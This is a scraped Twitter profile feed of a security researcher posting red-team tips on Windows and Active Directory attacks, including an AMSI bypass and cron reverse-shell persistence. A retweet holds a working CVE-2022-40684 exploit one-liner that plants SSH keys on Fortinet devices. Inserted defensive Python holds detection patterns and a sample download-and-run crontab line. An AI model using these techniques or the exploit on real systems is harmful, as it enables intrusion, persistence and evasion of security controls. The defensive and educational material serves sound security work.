Khalid Maina (@cyb3rkh4l1d) 's Twitter Profile
Khalid Maina

@cyb3rkh4l1d

Professional@( AppSec | ApiSec | NetSec | OffSec | InfoSec ).
Enthusiast@(Robotics | MicroServices ).

ID: 1476727935356715008

Link: https://cyberkhalid.com
Joined: 31-12-2021 01:32:55

297 Tweets

504 Followers

364 Following

Khalid Maina (@cyb3rkh4l1d):

If an attacker is able to manipulate the ACL for AdminSDHolder, then those ACLs will automatically be applied to all protected objects.

#cybersecurity #infosec #pentesting #redteam #windows #activedirectory
Khalid Maina (@cyb3rkh4l1d):

Adversaries may leverage the Windows CreateThread function from Kernel32.dll to execute malicious code within the virtual address space of the calling process.

cyberkhalid.github.io/posts/createth…

#cybersecurity #infosec #redteam #windows
Khalid Maina (@cyb3rkh4l1d):

If we can change the configuration of a service, and at the same time we can stop/start the service, then we can achieve Privilege Escalation if the service runs with higher privileges.

cyberkhalid.github.io/posts/winprivs…

#cybersecurity #infosec #redteam #windows
Khalid Maina (@cyb3rkh4l1d):

Once you have root access on any host, you can add any scheduled task. You could even just configure a task where every minute a reverse shell is sent to you.

cyberkhalid.github.io/posts/pcron/

#redteam #cybersecurity #infosec
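The tweet above describes scheduled tasks as a persistence mechanism. As an added example from the defender's side (not code from the original post or from the linked write-up), the Python below parses crontab text and flags the entries that warrant review: jobs firing every minute, commands run from world-writable temp directories, downloads piped into a shell, and similar indicators. The crontab content, the indicator list and the function names are constructed for this example.

```python
"""Cron persistence triage (added example; constructed data, not from any real host)."""
import re

# Command fragments that warrant review. Constructed, not exhaustive: an
# indicator list, not a signature set.
SUSPICIOUS_PATTERNS = [
    (r"(^|\s)(/tmp|/var/tmp|/dev/shm)/", "runs from world-writable temp dir"),
    (r"/dev/tcp/", "bash network redirection"),
    (r"\b(nc|ncat|netcat)\b.*\s-e\b", "netcat with -e"),
    (r"\bbash\s+-i\b", "interactive bash"),
    (r"\b(curl|wget)\b.*\|\s*(ba)?sh\b", "download piped to shell"),
    (r"\bbase64\s+(-d|--decode)\b", "base64-decoded payload"),
]

# A job line is either an @special keyword or five schedule fields, then the command.
_JOB_RE = re.compile(r"^(?P<schedule>@\w+|(?:\S+\s+){5})(?P<command>.+)$")

def parse_crontab(text):
    """Yield (lineno, schedule, command) for job lines; skip blanks, comments and VAR=value lines."""
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        m = _JOB_RE.match(line)
        if m:
            yield lineno, m.group("schedule").strip(), m.group("command").strip()

def runs_every_minute(schedule):
    """True for '* * * * *' and '*/1 * * * *' style schedules."""
    fields = schedule.split()
    return (len(fields) == 5 and fields[0] in ("*", "*/1")
            and all(f == "*" for f in fields[1:]))

def triage_crontab(text):
    """Return [(lineno, command, [reasons])] for entries worth a second look."""
    findings = []
    for lineno, schedule, command in parse_crontab(text):
        reasons = []
        if runs_every_minute(schedule):
            reasons.append("runs every minute")
        reasons += [label for pattern, label in SUSPICIOUS_PATTERNS
                    if re.search(pattern, command)]
        if reasons:
            findings.append((lineno, command, reasons))
    return findings

# Constructed crontab for a user account (sample input, not from a real system).
SAMPLE_CRONTAB = """\
SHELL=/bin/bash
# m h dom mon dow command
0 2 * * * /usr/local/bin/backup.sh
*/1 * * * * /tmp/.cache/update.sh > /dev/null 2>&1
30 * * * * curl -s http://203.0.113.9/u.sh | sh
@reboot /usr/bin/setup-env
"""

if __name__ == "__main__":
    for lineno, command, reasons in triage_crontab(SAMPLE_CRONTAB):
        print(f"line {lineno}: {command}")
        print("    -> " + ", ".join(reasons))
```

On a live system the same function can be fed the output of `crontab -l` for each account and the contents of `/etc/cron.d`; the schedule check is deliberately narrow (only the every-minute case) so that the indicator list, not the cadence, does most of the work.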
Khalid Maina (@cyb3rkh4l1d):

Since the AmsiScanBuffer() function is responsible for checking inputs for malicious content, we can modify the function to always return 0 regardless of whether or not the input is malicious, since returning 0 simply means the function successfully scanned the inputs.
Khalid Maina (@cyb3rkh4l1d):

Pass the Ticket (PtT) is a credential theft technique that enables adversaries to use stolen Kerberos tickets to authenticate to resources (e.g., file shares and other computers) as a user without having to compromise that user’s password.

cyberkhalid.github.io/posts/ptt/

#cybersecurity
Khalid Maina (@cyb3rkh4l1d):

If the server implicitly trusts the Host header and fails to validate or escape it properly, an attacker may be able to use this input to inject harmful payloads that manipulate server-side behavior. This could lead to authentication bypass.

cyberkhalid.github.io/posts/hheada/

#infosec
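As an added example (not code from the original post or the linked write-up), the Python below shows the pattern the tweet warns about and its fix: a password-reset link built straight from the Host header versus one built only after the header is checked against an allowlist of hostnames the deployment actually serves. The allowlist, function names and sample headers are constructed for this example.

```python
"""Host header allowlisting (added example; names and hosts are constructed)."""
import re

# Hostnames this deployment serves. Constructed for the example; a bare entry
# also covers the scheme's default port (80/443).
ALLOWED_HOSTS = {"app.example.com", "app.example.com:8443"}

# Host header: a DNS name or a bracketed IPv6 literal, optionally ':port'.
_HOST_RE = re.compile(r"(?P<host>\[[0-9A-Fa-f:.]+\]|[A-Za-z0-9.-]+)(?::(?P<port>\d{1,5}))?")

def parse_host(value):
    """Split a Host header into (hostname, port); None if the syntax is off."""
    m = _HOST_RE.fullmatch(value.strip())
    if not m:
        return None
    host = m.group("host").lower().rstrip(".")   # case and trailing-dot normalisation
    port = int(m.group("port")) if m.group("port") else None
    if port is not None and not 0 < port < 65536:
        return None
    return host, port

def validate_host(value, allowed=ALLOWED_HOSTS):
    """Return the canonical 'host' or 'host:port' if allowlisted, else None."""
    parsed = parse_host(value)
    if parsed is None:
        return None
    host, port = parsed
    if port is None or port in (80, 443):
        return host if host in allowed else None
    candidate = f"{host}:{port}"
    return candidate if candidate in allowed else None

def reset_link_trusting_host(headers, token):
    """Unsafe: the requester chooses the domain that ends up in the e-mailed link."""
    return f"https://{headers['Host']}/reset?token={token}"

def reset_link_validated(headers, token):
    """Hardened: the link is built only from an allowlisted host."""
    host = validate_host(headers.get("Host", ""))
    if host is None:
        raise ValueError("Host header not in allowlist")
    return f"https://{host}/reset?token={token}"

if __name__ == "__main__":
    # Constructed request headers: one legitimate, one with a requester-chosen Host.
    for hdrs in ({"Host": "app.example.com"}, {"Host": "app.example.com.attacker.example"}):
        print("trusting :", reset_link_trusting_host(hdrs, "t0k3n"))
        try:
            print("validated:", reset_link_validated(hdrs, "t0k3n"))
        except ValueError as exc:
            print("validated: rejected,", exc)
```

The allowlist is an exact-match set rather than a suffix check, so a host such as `app.example.com.attacker.example` is rejected even though it starts with the legitimate name; the same `validate_host` result should feed any other place the server derives something from Host, for example redirect targets or cache keys.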
H4x0r.DZ (@h4x0r_dz):

CVE-2022-40684

ffuf -w "host_list.txt:URL" -u "https://URL/api/v2/cmdb/system/admin/admin" -X PUT -H 'User-Agent: Report Runner' -H 'Content-Type: application/json' -H 'Forwarded: for="[127.0.0.1]:8000";by=”[127.0.0.1]:9000";' -d '{"ssh-public-key1": "h4x0r"}' -mr "SSH" -r
Khalid Maina (@cyb3rkh4l1d):

Malware can use the CreateThread() function from the kernel32.dll library to execute shellcode.

#cybersecurity #infosec #offsec #redteaming #pentesting #windows
CVE (@cvenew):

CVE-2022-42983 anji-plus AJ-Report 0.9.8.6 allows remote attackers to bypass login authentication by spoofing JWT Tokens. cve.mitre.org/cgi-bin/cvenam…

Khalid Maina (@cyb3rkh4l1d):

Shellcode will be executed by calling the EnumPageFilesW() function with the pCallBackRoutine parameter set to the base address of the shellcode.

#cybersecurity #infosec #redteaming #pentesting
Khalid Maina (@cyb3rkh4l1d):

This is possible because any machine account with the SERVER_TRUST_ACCOUNT flag set will have the Replication right.

cyberkhalid.github.io/posts/machuser/
Khalid Maina (@cyb3rkh4l1d):

The path is clear:

-> If you have GenericAll on a group, you can add yourself to the group.
-> If you have WriteDacl on a domain, you can execute a DCSync attack to retrieve account hashes.
-> If you have hashes, you can execute a Pass-the-Hash attack to gain access.

Simple

#infosec
Khalid Maina (@cyb3rkh4l1d):

Another hit🔥

Tips: After removing the invited user, try to use the invitation link sent to the user.

#bugbountytips #hackerone #infosec
Khalid Maina (@cyb3rkh4l1d):

-> Establish persistence using schtasks.
-> This will create a scheduled task to spawn backdoor.exe at 11:30.

#infosec #cybersecuritytips #redteam
FofaBot (@fofabot):

#CVE-2023-2982 #WordPress Social Login and Register authentication bypass🚩

FOFA Query: body="/wp-content/plugins/miniorange-login-openid"

Link: enbeta.fofa.info/result?qbase64…

Refer: lana.codes/lanavdb/2326f4…

#cybersecurity #infosec #OSINT #FOFA #ThreatIntelligence
BleepingComputer (@bleepincomputer):

Defend your network with $70 off this cybersecurity course bundle bleepingcomputer.com/offer/deals/de…